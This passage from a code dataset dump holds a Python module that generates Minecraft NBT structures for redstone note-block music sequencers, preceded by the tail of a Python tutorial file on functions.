have access to ?\r\n#who has access to who?\r\n\r\n\r\n#Global keyword\r\n#nonlocal keyword\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"vigneshSs-07/Complete-AtoZ-PythonProgramming","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29697172600","text":"import block_settings as blocks\nfrom nbt_structure_utils import (\n BlockData,\n Cuboid,\n Inventory,\n ItemStack,\n NBTStructure,\n Vector,\n)\nfrom process_song import Channel, TickChannels\n\nMAX_NOTES_IN_CHANNEL = 10\n\n\ndef generate_wall_song_nbt_structure(\n instruments: list[blocks.InstrumentBlock],\n channels: list[Channel],\n tickchannels: list[TickChannels],\n max_height: int = 384,\n) -> NBTStructure:\n channel_count_1, channel_count_2 = determine_channel_counts(len(channels))\n ordered_channels = reorder_channels(channels)\n channels1 = ordered_channels[0:channel_count_1]\n channels2 = ordered_channels[channel_count_1:] if channel_count_2 > 0 else []\n\n # build layer by layer and structure by structure.\n structure1 = build_sequencer(instruments, channels1, tickchannels, True, max_height)\n place_starter(structure1)\n # listening zone\n curr_vol = Cuboid(Vector(0, 1, -1), Vector(6, 1, -3))\n structure1.fill_keep(curr_vol, blocks.floor_building)\n structure1.set_block(Vector(3, 1, -2), blocks.light_source)\n\n # if we needed the space, generate a 2nd one and place behind player listening spot.\n if any(channels2):\n offset = Vector(0, 0, -3 - len(channels2))\n structure2 = build_sequencer(\n instruments, channels2, tickchannels, False, max_height\n )\n structure1.clone_structure(structure2, offset)\n\n return structure1\n\n\ndef determine_channel_counts(total_channels: int) -> tuple[int, int]:\n max_channels_per_side = 30\n channel_count_1 = total_channels\n channel_count_2 = 0\n if channel_count_1 > max_channels_per_side * 2:\n raise ValueError(\n \"Max channel count is %i but %i were parsed from song.\"\n % (max_channels_per_side * 2, channel_count_1)\n )\n if channel_count_1 > max_channels_per_side:\n channel_count_2 = channel_count_1 // 2\n channel_count_1 -= channel_count_2\n return channel_count_1, channel_count_2\n\n\ndef reorder_channels(channels: list[Channel]) -> list[Channel]:\n working_channels = sorted(channels, key=len)\n ordered_channels = []\n while any(working_channels):\n ordered_channels.append(working_channels.pop(0))\n if any(working_channels):\n ordered_channels.append(working_channels.pop())\n return ordered_channels\n\n\ndef build_sequencer(\n instruments: list[blocks.InstrumentBlock],\n channels: list[Channel],\n tickchannels: TickChannels,\n is_south_half: bool,\n max_height: int,\n) -> NBTStructure:\n structure = NBTStructure()\n build_base(structure, instruments, channels, is_south_half)\n encode_song(structure, channels, tickchannels, is_south_half, max_height)\n\n return structure\n\n\ndef build_base(\n structure: NBTStructure,\n instruments: list[blocks.InstrumentBlock],\n channels: list[Channel],\n is_south_half: bool,\n) -> None:\n \"\"\"build section from bottom up to just before note encoding\"\"\"\n # layers 0 - 4 without note blocks. align 1st channel's walls with 0,y,0\n max_z = len(channels) - 1\n curr_block = blocks.redstone_solid_support\n curr_vol = Cuboid(Vector(2, 0, 0), Vector(6, 0, max_z))\n structure.fill(curr_vol, curr_block)\n curr_vol = Cuboid(Vector(0, 2, 0), Vector(0, 2, max_z))\n structure.fill(curr_vol, curr_block)\n curr_vol = Cuboid(Vector(6, 2, 0), Vector(6, 2, max_z))\n structure.fill(curr_vol, curr_block)\n\n for z in range(0, max_z + 1):\n curr_block = (\n blocks.get_powered_rail(\"east_west\") if z % 2 == 0 else blocks.redstone_wire\n )\n curr_vol = Cuboid(Vector(2, 1, z), Vector(6, 1, z))\n structure.fill(curr_vol, curr_block)\n structure.set_block(Vector(0, 3, z), curr_block)\n\n curr_vol = Cuboid(Vector(2, 2, 0), Vector(2, 2, max_z))\n structure.fill(curr_vol, blocks.get_observer(\"down\"))\n curr_vol = Cuboid(Vector(1, 3, 0), Vector(1, 3, max_z))\n structure.fill(curr_vol, blocks.get_observer(\"west\"))\n curr_vol = Cuboid(Vector(0, 4, 0), Vector(0, 4, max_z))\n structure.fill(curr_vol, blocks.get_observer(\"up\"))\n curr_vol = Cuboid(Vector(6, 3, 0), Vector(6, 4, max_z))\n structure.fill(curr_vol, blocks.get_observer(\"up\"))\n\n # fill in note blocks and floor around them\n for z, channel in enumerate(channels):\n build_chord(structure, instruments, channel, z)\n curr_vol = Cuboid(Vector(3, 2, 0), Vector(5, 2, max_z))\n structure.fill_keep(curr_vol, blocks.floor_building)\n\n bus_to_torch_towers(structure, max_z, is_south_half)\n\n\ndef build_chord(\n structure: NBTStructure,\n instruments: list[blocks.InstrumentBlock],\n channel: Channel,\n z: int,\n) -> None:\n if len(channel) > MAX_NOTES_IN_CHANNEL:\n raise ValueError(\n \"Can only support %i gravity blocks in a chord.\" % (MAX_NOTES_IN_CHANNEL)\n )\n\n instrument_blocks = [\n next(\n instr.copy_with_key(note.key)\n for instr in instruments\n if instr.id == note.block_id\n )\n for note in channel\n ]\n\n # sort list to have a solid block first\n instrument_blocks.sort(key=lambda n: (not n.transmits_redstone, n.id, n.key))\n chord_built = build_small_chord(structure, instrument_blocks, z)\n if not chord_built:\n build_big_chord(structure, instrument_blocks, z)\n\n\ndef build_big_chord(\n structure: NBTStructure, instrument_blocks: list[blocks.InstrumentBlock], z: int\n) -> None:\n skip_4th_block = fix_4th_block(instrument_blocks)\n structure.set_block(Vector(2, 3, z), blocks.redstone_solid_support)\n\n vertical_bus = get_vertical_wire_segment()\n\n structure.set_block(Vector(2, 4, z), blocks.redstone_wire_connecting)\n structure.set_block(Vector(3, 2, z), blocks.redstone_bus_trans)\n structure.set_block(Vector(3, 3, z), blocks.redstone_wire_connecting)\n # 1st\n place_instrument(structure, Vector(4, 3, z), instrument_blocks.pop(0))\n # 2nd\n place_instrument(structure, Vector(5, 3, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n structure.clone_structure(vertical_bus, Vector(1, 4, z))\n # 3rd\n place_instrument(structure, Vector(3, 6, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n # 4th\n if skip_4th_block is False:\n place_instrument(structure, Vector(4, 6, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n # double bus's vertical distance\n vertical_bus.clone_structure(vertical_bus, Vector(0, 2, 0))\n structure.clone_structure(vertical_bus, Vector(1, 6, z))\n # 5th\n place_instrument(structure, Vector(3, 10, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n # 6th\n place_instrument(structure, Vector(4, 10, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n structure.clone_structure(vertical_bus, Vector(1, 10, z))\n # 7th\n place_instrument(structure, Vector(3, 14, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n # 8th\n place_instrument(structure, Vector(4, 14, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n structure.clone_structure(vertical_bus, Vector(1, 14, z))\n # 9th\n place_instrument(structure, Vector(3, 18, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n # 10th\n place_instrument(structure, Vector(4, 18, z), instrument_blocks.pop(0))\n\n\ndef place_instrument(\n nbt_s: NBTStructure,\n note_block_pos: Vector,\n block_info: blocks.InstrumentBlock,\n) -> None:\n if block_info is not None:\n curr_pos = note_block_pos.copy()\n curr_pos.y += 1\n nbt_s.set_block(curr_pos, blocks.air)\n curr_pos.y -= 1\n nbt_s.set_block(curr_pos, block_info.get_note_block())\n curr_pos.y -= 1\n nbt_s.set_block(curr_pos, block_info.block_data)\n curr_pos.y -= 1\n if block_info.gravity and nbt_s.get_block_state(curr_pos) is None:\n nbt_s.set_block(curr_pos, blocks.redstone_bus_trans)\n\n\ndef build_small_chord(\n structure: NBTStructure, instrument_blocks: list[blocks.InstrumentBlock], z: int\n) -> bool:\n \"\"\"Build all 1 note and some 2 note chords. Return True if chord was built\"\"\"\n if len(instrument_blocks) <= 2 and any(\n b for b in instrument_blocks if b.transmits_redstone\n ):\n place_instrument(structure, Vector(2, 4, z), instrument_blocks.pop(0))\n if any(instrument_blocks):\n place_instrument(structure, Vector(3, 3, z), instrument_blocks.pop(0))\n return True\n elif len(instrument_blocks) == 1:\n structure.set_block(Vector(2, 3, z), blocks.redstone_solid_support)\n place_instrument(structure, Vector(3, 3, z), instrument_blocks.pop(0))\n return True\n return False\n\n\ndef get_vertical_wire_segment() -> NBTStructure:\n vertical_bus = NBTStructure()\n vertical_bus.set_block(Vector(0, 0, 0), blocks.redstone_bus_trans)\n vertical_bus.set_block(Vector(0, 1, 0), blocks.redstone_wire_connecting)\n vertical_bus.set_block(Vector(1, 1, 0), blocks.redstone_bus_trans)\n vertical_bus.set_block(Vector(1, 2, 0), blocks.redstone_wire_connecting)\n return vertical_bus\n\n\ndef fix_4th_block(instrument_blocks: list[blocks.InstrumentBlock]) -> bool:\n \"\"\"Make sure 4th block is not a gravity block. Return true if no substitution could be made.\"\"\"\n skip_4th_block = False\n if len(instrument_blocks) >= 4 and instrument_blocks[3].gravity is True:\n index = next(\n (i for i, item in enumerate(instrument_blocks) if item.gravity is False), -1\n )\n if index == -1:\n skip_4th_block = True\n if len(instrument_blocks) > MAX_NOTES_IN_CHANNEL - 1:\n raise ValueError(\n \"Can only support %i gravity blocks in a chord.\"\n % (MAX_NOTES_IN_CHANNEL - 1)\n )\n else:\n instrument_blocks[index], instrument_blocks[3] = (\n instrument_blocks[3],\n instrument_blocks[index],\n )\n return skip_4th_block\n\n\ndef bus_to_torch_towers(\n structure: NBTStructure, max_z: int, is_south_half: bool\n) -> None:\n # bus signal to start of torch lines\n if max_z < 15:\n curr_vol = Cuboid(Vector(4, 19, -1), Vector(5, 19, -1))\n structure.fill(curr_vol, blocks.redstone_bus_torch)\n curr_vol = Cuboid(Vector(4, 20, -1), Vector(5, 20, -1))\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n else:\n # bus between torch towers\n curr_vol = Cuboid(Vector(5, 18, 0), Vector(5, 18, max_z))\n structure.fill(curr_vol, blocks.redstone_bus_trans)\n curr_vol = Cuboid(Vector(5, 19, 0), Vector(5, 19, max_z))\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n dir = \"north\" if is_south_half else \"south\"\n z_pos = (max_z + 3) // 3\n structure.set_block(Vector(5, 19, z_pos), blocks.get_repeater(dir, 1))\n structure.set_block(Vector(5, 19, z_pos * 2), blocks.get_repeater(dir, 1))\n # start of torch lines\n curr_vol = Cuboid(Vector(4, 19, max_z + 1), Vector(5, 19, max_z + 1))\n structure.fill(curr_vol, blocks.redstone_bus_torch)\n curr_vol = Cuboid(Vector(4, 20, max_z + 1), Vector(5, 20, max_z + 1))\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n curr_vol = Cuboid(Vector(4, 19, -1), Vector(5, 19, -1))\n structure.fill(curr_vol, blocks.redstone_bus_torch)\n curr_vol = Cuboid(Vector(4, 20, -1), Vector(5, 20, -1))\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n if is_south_half:\n structure.set_block(Vector(4, 20, -1), blocks.get_repeater(\"east\", 2))\n else:\n structure.set_block(\n Vector(4, 20, max_z + 1), blocks.get_repeater(\"east\", 2)\n )\n structure.set_block(Vector(4, 20, max_z + 3), blocks.air)\n\n\ndef place_starter(structure: NBTStructure) -> None:\n starter = NBTStructure()\n starter.set_block(Vector(0, 0, 0), blocks.get_button(\"stone\", \"south\", \"ceiling\"))\n starter.set_block(Vector(0, 1, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 2, 0), blocks.get_redstone_torch(True, None))\n starter.set_block(Vector(0, 3, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 4, 0), blocks.get_redstone_torch(False, None))\n starter.set_block(Vector(0, 5, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 6, 0), blocks.get_redstone_torch(True, None))\n starter.set_block(Vector(0, 7, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 8, 0), blocks.get_redstone_torch(False, None))\n starter.set_block(Vector(0, 9, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 10, 0), blocks.get_redstone_torch(True, None))\n starter.set_block(Vector(0, 11, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 12, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(-1, 11, 0), blocks.get_sticky_piston(\"up\"))\n starter.set_block(Vector(-1, 13, 0), blocks.get_observer(\"west\"))\n starter.set_block(Vector(1, 11, 0), blocks.redstone_bus_trans)\n starter.set_block(Vector(2, 11, 0), blocks.redstone_bus_trans)\n starter.set_block(Vector(1, 12, 0), blocks.get_repeater(\"west\", 2))\n starter.set_block(Vector(2, 12, 0), blocks.redstone_wire_connecting)\n\n starter.set_block(Vector(1, 8, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(1, 9, 0), blocks.get_comparator(\"east\", \"compare\"))\n starter.set_block(Vector(2, 9, 0), blocks.get_dropper(\"up\"))\n inv = Inventory([ItemStack(\"minecraft:wooden_sword\", 1, 0, 0, [])])\n starter.set_block(Vector(2, 10, 0), blocks.get_dropper(\"down\"), inv)\n\n structure.clone_structure(starter, Vector(3, 7, -2))\n\n\ndef encode_song(\n structure: NBTStructure,\n channels: list[Channel],\n tickchannels: TickChannels,\n is_south_half: bool,\n max_height: int,\n) -> None:\n \"\"\"place pistons that will update walls\"\"\"\n channel_positions = get_channel_positions(channels)\n max_z = len(channels) - 1\n starting_height = 20\n repeating_blocks = get_piston_redstone_line(max_z, is_south_half)\n max_tick = max([t.tick for t in tickchannels])\n # fill middle section up to height, then add to sides to expand\n curr_tick = 0\n curr_y = starting_height\n while max_height >= (curr_y + 1) and max_tick >= curr_tick:\n structure.clone_structure(repeating_blocks, Vector(3, curr_y, 0))\n # on beat (even redstone tick)\n tick = next((item for item in tickchannels if item.tick == curr_tick), None)\n if tick is not None:\n place_pistons(\n structure,\n 2,\n curr_y, # yum\n tick.channels,\n channel_positions,\n blocks.get_piston(\"west\"),\n )\n curr_tick += 1\n # on eighth (odd redstone tick)\n tick = next((item for item in tickchannels if item.tick == curr_tick), None)\n if tick is not None:\n place_pistons(\n structure,\n 4,\n curr_y,\n tick.channels,\n channel_positions,\n blocks.get_piston(\"east\"),\n )\n curr_tick += 1\n curr_y += 2\n\n # add walls and blocks that go next to walls\n wall_structure = get_wall(max_z, curr_y - 1)\n structure.clone_structure(wall_structure, Vector(0, 0, 0))\n structure.clone_structure(wall_structure, Vector(6, 0, 0))\n\n if curr_tick > max_tick:\n if is_south_half:\n place_downward_line(\n structure,\n Vector(6, 17, -2),\n curr_y - 1,\n blocks.redstone_bus_reset,\n False,\n )\n structure.set_block(\n Vector(4, curr_y - 1, -2), blocks.get_redstone_torch(False, \"east\")\n )\n else:\n downward_line_max_y = curr_y - 5\n if is_south_half:\n place_downward_line(\n structure,\n Vector(0, 21, -2),\n downward_line_max_y,\n blocks.redstone_bus_torch,\n True,\n )\n structure.set_block(\n Vector(4, downward_line_max_y, -2),\n blocks.get_redstone_torch(False, \"east\"),\n )\n place_downward_line(\n structure,\n Vector(6, 21, -2),\n downward_line_max_y,\n blocks.redstone_bus_torch,\n False,\n )\n structure.set_block(\n Vector(2, downward_line_max_y, -2),\n blocks.get_redstone_torch(False, \"west\"),\n )\n extend_song(\n structure,\n curr_tick,\n max_tick,\n tickchannels,\n channel_positions,\n is_south_half,\n starting_height,\n max_height,\n downward_line_max_y - 4,\n max_z,\n repeating_blocks,\n -3,\n 9,\n )\n\n\n# max_z is for wall blacks only and does not include the solid edges\ndef get_wall(max_z, height) -> NBTStructure:\n temp_structure = NBTStructure()\n curr_volume = Cuboid(Vector(0, 5, -1), Vector(0, height, -1))\n temp_structure.fill(curr_volume, blocks.neutral_building)\n curr_volume = Cuboid(Vector(0, 5, max_z), Vector(0, height, max_z + 1))\n temp_structure.fill(curr_volume, blocks.neutral_building)\n curr_volume = Cuboid(Vector(0, 5, 0), Vector(0, height - 1, max_z))\n temp_structure.fill(curr_volume, blocks.get_flat_wall(is_top=False, dir=\"north\"))\n curr_volume = Cuboid(Vector(0, height, 0), Vector(0, height, max_z))\n temp_structure.fill(curr_volume, blocks.get_flat_wall(is_top=True, dir=\"north\"))\n return temp_structure\n\n\ndef get_bottom_extender_east(max_z: int) -> NBTStructure:\n temp_structure = NBTStructure()\n curr_vol = Cuboid(Vector(0, 0, 0), Vector(4, 0, max_z))\n temp_structure.fill(curr_vol, blocks.redstone_solid_support)\n curr_vol = Cuboid(Vector(0, 1, 0), Vector(2, 1, max_z))\n temp_structure.fill(curr_vol, blocks.get_observer(\"east\"))\n curr_vol = Cuboid(Vector(4, 2, 0), Vector(4, 2, max_z))\n temp_structure.fill(curr_vol, blocks.redstone_solid_support)\n curr_vol = Cuboid(Vector(4, 3, 0), Vector(4, 4, max_z))\n temp_structure.fill(curr_vol, blocks.get_observer(\"up\"))\n for z in range(0, max_z + 1):\n curr_block = (\n blocks.get_powered_rail(\"east_west\") if z % 2 == 0 else blocks.redstone_wire\n )\n curr_vol = Cuboid(Vector(2, 1, z), Vector(4, 1, z))\n temp_structure.fill(curr_vol, curr_block)\n return temp_structure\n\n\ndef get_bottom_extender_west(max_z: int) -> NBTStructure:\n temp_structure = NBTStructure()\n curr_vol = Cuboid(Vector(0, 0, 0), Vector(4, 0, max_z))\n temp_structure.fill(curr_vol, blocks.redstone_solid_support)\n curr_vol = Cuboid(Vector(3, 1, 0), Vector(4, 1, max_z))\n temp_structure.fill(curr_vol, blocks.get_observer(\"west\"))\n curr_vol = Cuboid(Vector(0, 2, 0), Vector(0, 2, max_z))\n temp_structure.fill(curr_vol, blocks.get_observer(\"up\"))\n for z in range(0, max_z + 1):\n curr_block = (\n blocks.get_powered_rail(\"east_west\") if z % 2 == 0 else blocks.redstone_wire\n )\n curr_vol = Cuboid(Vector(0, 1, z), Vector(2, 1, z))\n temp_structure.fill(curr_vol, curr_block)\n return temp_structure\n\n\ndef extend_song(\n structure: NBTStructure,\n curr_tick: int,\n max_tick: int,\n tickchannels: TickChannels,\n channel_positions: dict[int, int],\n is_south_half: bool,\n starting_height: int,\n max_height: int,\n downward_line_max_y: int,\n max_channel_z: int,\n repeating_blocks: NBTStructure,\n x_west_center: int,\n x_east_center: int,\n) -> None:\n west_wing = NBTStructure() # on beat, even tick\n east_wing = NBTStructure() # off beat, odd tick\n\n curr_y = starting_height\n while max_height >= (curr_y + 1) and max_tick >= curr_tick:\n west_wing.clone_structure(repeating_blocks, Vector(0, curr_y, 0))\n east_wing.clone_structure(repeating_blocks, Vector(0, curr_y, 0))\n # on beat (even redstone tick)\n tick = next((item for item in tickchannels if item.tick == curr_tick), None)\n if tick is not None:\n place_pistons(\n west_wing,\n 1,\n curr_y,\n tick.channels,\n channel_positions,\n blocks.get_piston(\"east\"),\n )\n curr_tick += 1\n # on eighth (odd redstone tick)\n tick = next((item for item in tickchannels if item.tick == curr_tick), None)\n if tick is not None:\n place_pistons(\n east_wing,\n -1,\n curr_y,\n tick.channels,\n channel_positions,\n blocks.get_piston(\"west\"),\n )\n curr_tick += 1\n curr_y += 2\n bus_to_torch_towers_extended(\n west_wing, 2, starting_height, max_channel_z, is_south_half, False\n )\n bus_to_torch_towers_extended(\n east_wing, -2, starting_height, max_channel_z, is_south_half, True\n )\n\n structure.clone_structure(west_wing, Vector(x_west_center, 0, 0))\n structure.clone_structure(east_wing, Vector(x_east_center, 0, 0))\n\n if curr_tick > max_tick:\n if is_south_half:\n # place observer wire down to reset line\n y_top = ((curr_y - 20) // 2) + 20\n if y_top % 2 == 1:\n y_top -= 1\n pos_top = Vector(x_east_center - 1, y_top, -2)\n pos_bot = Vector(x_east_center - 1, 17, -2)\n structure.fill(Cuboid(pos_top, pos_bot), blocks.get_observer(facing=\"up\"))\n pos_top.y += 1\n structure.set_block(pos_top, blocks.get_redstone_torch(False, \"west\"))\n pos_bot.y -= 1\n structure.set_block(pos_bot, blocks.redstone_bus_reset)\n pos_bot.x -= 1\n structure.set_block(pos_bot, blocks.redstone_wire_connecting)\n pos_bot.x -= 1\n structure.set_block(pos_bot, blocks.redstone_wire_connecting)\n pos_bot.y -= 1\n structure.set_block(pos_bot, blocks.redstone_bus_reset)\n pos_bot.x += 1\n structure.set_block(pos_bot, blocks.redstone_bus_reset)\n else:\n if is_south_half:\n # east\n place_downward_line(\n structure,\n Vector(x_east_center + 2, 21, -2),\n downward_line_max_y,\n blocks.redstone_bus_torch,\n True,\n )\n curr_pos = Vector(x_east_center, downward_line_max_y, -3)\n final_pos = Vector(x_east_center + 3, downward_line_max_y + 1, -3)\n curr_vol = Cuboid(curr_pos, final_pos)\n structure.fill(curr_vol, blocks.redstone_bus_torch)\n structure.set_block(curr_pos, blocks.get_redstone_torch(\"north\", True))\n curr_pos.y += 1\n curr_pos.x += 1\n curr_vol = Cuboid(curr_pos, final_pos)\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n structure.set_block(curr_pos, blocks.get_repeater(\"west\", 2))\n # reset line below\n pos1 = Vector(x_east_center - 3, 16, -2)\n pos2 = Vector(x_east_center + 1, 15, -2)\n structure.fill(Cuboid(pos1, pos2), blocks.redstone_bus_reset)\n pos1.x += 1\n pos2.y += 1\n structure.fill(Cuboid(pos1, pos2), blocks.redstone_wire_connecting)\n structure.set_block(pos1, blocks.get_repeater(\"east\", 1))\n\n # west\n place_downward_line(\n structure,\n Vector(x_west_center - 2, 21, -2),\n downward_line_max_y,\n blocks.redstone_bus_torch,\n False,\n )\n curr_pos = Vector(x_west_center, downward_line_max_y, -3)\n final_pos = Vector(x_west_center - 3, downward_line_max_y + 1, -3)\n curr_vol = Cuboid(curr_pos, final_pos)\n structure.fill(curr_vol, blocks.redstone_bus_torch)\n structure.set_block(curr_pos, blocks.get_redstone_torch(\"north\", True))\n curr_pos.y += 1\n curr_pos.x -= 1\n curr_vol = Cuboid(curr_pos, final_pos)\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n structure.set_block(curr_pos, blocks.get_repeater(\"east\", 2))\n\n # place next wall + bussings\n wall_structure = get_wall(max_channel_z, curr_y - 1)\n structure.clone_structure(wall_structure, Vector(x_west_center - 2, 0, 0))\n structure.clone_structure(wall_structure, Vector(x_east_center + 2, 0, 0))\n east_bussing = get_bottom_extender_east(max_channel_z)\n structure.clone_structure(east_bussing, Vector(x_east_center - 2, 0, 0))\n west_bussing = get_bottom_extender_west(max_channel_z)\n structure.clone_structure(west_bussing, Vector(x_west_center - 2, 2, 0))\n\n # extend\n extend_song(\n structure,\n curr_tick,\n max_tick,\n tickchannels,\n channel_positions,\n is_south_half,\n starting_height,\n max_height,\n downward_line_max_y,\n max_channel_z,\n repeating_blocks,\n x_west_center - 5,\n x_east_center + 5,\n )\n\n\ndef bus_to_torch_towers_extended(\n structure: NBTStructure,\n x: int,\n y: int,\n max_z: int,\n is_south_half: bool,\n is_east_half: bool,\n) -> None:\n # bus signal to start of torch lines\n\n if max_z < 15:\n structure.set_block(Vector(x, y - 1, -2), blocks.redstone_bus_torch)\n structure.set_block(Vector(x, y, -2), blocks.redstone_wire_connecting)\n structure.set_block(Vector(x, y - 1, -1), blocks.redstone_bus_torch)\n structure.set_block(Vector(x, y, -1), blocks.redstone_wire_connecting)\n if is_east_half:\n structure.set_block(Vector(x + 1, y - 1, -1), blocks.redstone_bus_torch)\n structure.set_block(Vector(x + 1, y, -1), blocks.get_repeater(\"west\", 2))\n structure.set_block(Vector(x - 1, y + 2, -2), blocks.get_observer(\"up\"))\n else:\n structure.set_block(Vector(x - 1, y - 1, -1), blocks.redstone_bus_torch)\n structure.set_block(Vector(x - 1, y, -1), blocks.get_repeater(\"east\", 2))\n structure.set_block(Vector(x + 1, y + 2, -2), blocks.get_observer(\"up\"))\n else:\n structure.set_block(Vector(x, y - 1, -1), blocks.redstone_bus_torch)\n structure.set_block(Vector(x, y, -1), blocks.redstone_wire_connecting)\n # bus between torch towers\n curr_vol = Cuboid(Vector(x, y - 2, 0), Vector(x, y - 2, max_z))\n structure.fill(curr_vol, blocks.redstone_bus_trans)\n curr_vol = Cuboid(Vector(x, y - 1, 0), Vector(x, y - 1, max_z))\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n dir = \"north\" if is_south_half else \"south\"\n z_pos = (max_z + 3) // 3\n structure.set_block(Vector(x, y - 1, z_pos), blocks.get_repeater(dir, 1))\n structure.set_block(Vector(x, y - 1, z_pos * 2), blocks.get_repeater(dir, 1))\n # start of torch lines\n if is_south_half:\n structure.set_block(Vector(x, y - 1, -2), blocks.redstone_bus_torch)\n structure.set_block(Vector(x, y, -2), blocks.redstone_wire_connecting)\n if is_east_half:\n structure.set_block(Vector(x + 1, y - 1, -1), blocks.redstone_bus_torch)\n if is_south_half:\n structure.set_block(\n Vector(x + 1, y, -1), blocks.get_repeater(\"west\", 2)\n )\n structure.set_block(Vector(x, y + 1, -2), blocks.get_observer(\"up\"))\n structure.set_block(Vector(x - 1, y + 2, -2), blocks.get_observer(\"up\"))\n structure.set_block(Vector(x, y + 2, -2), blocks.get_observer(\"west\"))\n else:\n structure.set_block(\n Vector(x + 1, y, -1), blocks.redstone_wire_connecting\n )\n curr_pos = Vector(x + 1, y - 1, max_z + 1)\n structure.set_block(curr_pos, blocks.redstone_bus_torch)\n curr_pos.x -= 1\n structure.set_block(curr_pos, blocks.redstone_bus_torch)\n curr_pos.y += 1\n structure.set_block(curr_pos, blocks.redstone_wire_connecting)\n curr_pos.x += 1\n if is_south_half:\n structure.set_block(curr_pos, blocks.redstone_wire_connecting)\n else:\n structure.set_block(curr_pos, blocks.get_repeater(\"west\", 2))\n structure.set_block(Vector(x + 1, y, max_z + 3), blocks.air)\n else:\n structure.set_block(Vector(x - 1, y - 1, -1), blocks.redstone_bus_torch)\n if is_south_half:\n structure.set_block(\n Vector(x - 1, y, -1), blocks.get_repeater(\"east\", 2)\n )\n structure.set_block(Vector(x, y + 1, -2), blocks.get_observer(\"up\"))\n structure.set_block(Vector(x + 1, y + 2, -2), blocks.get_observer(\"up\"))\n structure.set_block(Vector(x, y + 2, -2), blocks.get_observer(\"east\"))\n else:\n structure.set_block(\n Vector(x - 1, y, -1), blocks.redstone_wire_connecting\n )\n curr_pos = Vector(x - 1, y - 1, max_z + 1)\n structure.set_block(curr_pos, blocks.redstone_bus_torch)\n curr_pos.x += 1\n structure.set_block(curr_pos, blocks.redstone_bus_torch)\n curr_pos.y += 1\n structure.set_block(curr_pos, blocks.redstone_wire_connecting)\n curr_pos.x -= 1\n if is_south_half:\n structure.set_block(curr_pos, blocks.redstone_wire_connecting)\n else:\n structure.set_block(curr_pos, blocks.get_repeater(\"east\", 2))\n structure.set_block(Vector(x - 1, y, max_z + 3), blocks.air)\n\n\n# goal: create list so we can input channel id as index, get back block's z\ndef get_channel_positions(channels: list[Channel]) -> dict[int, int]:\n channel_positions: dict[int, int] = {}\n for i in range(max(channel.id for channel in channels) + 1):\n pos = next((j for j, chan in enumerate(channels) if chan.id == i), None)\n channel_positions[i] = pos\n return channel_positions\n\n\ndef place_pistons(\n structure: NBTStructure,\n x: int,\n y: int,\n channels_to_place: list[int],\n channel_pos: dict,\n block: BlockData,\n) -> None:\n for chan_id in channels_to_place:\n if channel_pos.get(chan_id, None) is not None:\n structure.set_block(Vector(x, y, channel_pos[chan_id]), block)\n\n\ndef get_piston_redstone_line(max_z: int, is_south_half: bool) -> NBTStructure:\n # main line\n p_structure = NBTStructure()\n curr_vol = Cuboid(Vector(0, 0, 0), Vector(0, 0, max_z))\n p_structure.fill(curr_vol, blocks.redstone_bus_main)\n curr_vol = Cuboid(Vector(0, 1, 0), Vector(0, 1, max_z))\n p_structure.fill(curr_vol, blocks.redstone_wire_connecting)\n # torch towers\n if is_south_half or max_z >= 15:\n p_structure.set_block(Vector(0, 0, -1), blocks.redstone_bus_torch)\n p_structure.set_block(\n Vector(0, 0, -2), blocks.get_redstone_torch(True, \"north\")\n )\n p_structure.set_block(Vector(0, 1, -2), blocks.redstone_bus_torch)\n p_structure.set_block(\n Vector(0, 1, -1), blocks.get_redstone_torch(False, \"south\")\n )\n if not is_south_half or max_z >= 15:\n p_structure.set_block(Vector(0, 0, max_z + 1), blocks.redstone_bus_torch)\n p_structure.set_block(\n Vector(0, 0, max_z + 2), blocks.get_redstone_torch(True, \"south\")\n )\n p_structure.set_block(Vector(0, 1, max_z + 2), blocks.redstone_bus_torch)\n p_structure.set_block(\n Vector(0, 1, max_z + 1), blocks.get_redstone_torch(False, \"north\")\n )\n return p_structure\n\n\ndef place_downward_line(\n structure: NBTStructure,\n observer_pos: Vector,\n max_y: int,\n bottom_block: BlockData,\n input_on_east: bool,\n) -> None:\n structure.set_block(observer_pos, blocks.get_observer(\"up\"))\n pos1 = observer_pos.copy()\n pos1.y -= 1\n structure.set_block(pos1, bottom_block)\n pos1.y += 2\n pos2 = observer_pos.copy()\n pos2.y = max_y\n curr_vol = Cuboid(pos1, pos2)\n structure.fill(curr_vol, blocks.get_flat_wall(is_top=False, dir=\"north\"))\n structure.set_block(pos2, blocks.get_flat_wall(is_top=True, dir=\"north\"))\n pos1.z -= 1\n pos2.z -= 1\n curr_vol = Cuboid(pos1, pos2)\n structure.fill(curr_vol, blocks.neutral_building)\n pos1.z += 2\n pos2.z += 2\n curr_vol = Cuboid(pos1, pos2)\n structure.fill(curr_vol, blocks.neutral_building)\n\n if input_on_east:\n curr_pos = Vector(observer_pos.x + 1, max_y, observer_pos.z)\n structure.set_block(curr_pos, blocks.get_trap_door(\"iron\", \"east\", \"top\"))\n else:\n curr_pos = Vector(observer_pos.x - 1, max_y, observer_pos.z)\n structure.set_block(curr_pos, blocks.get_trap_door(\"iron\", \"west\", 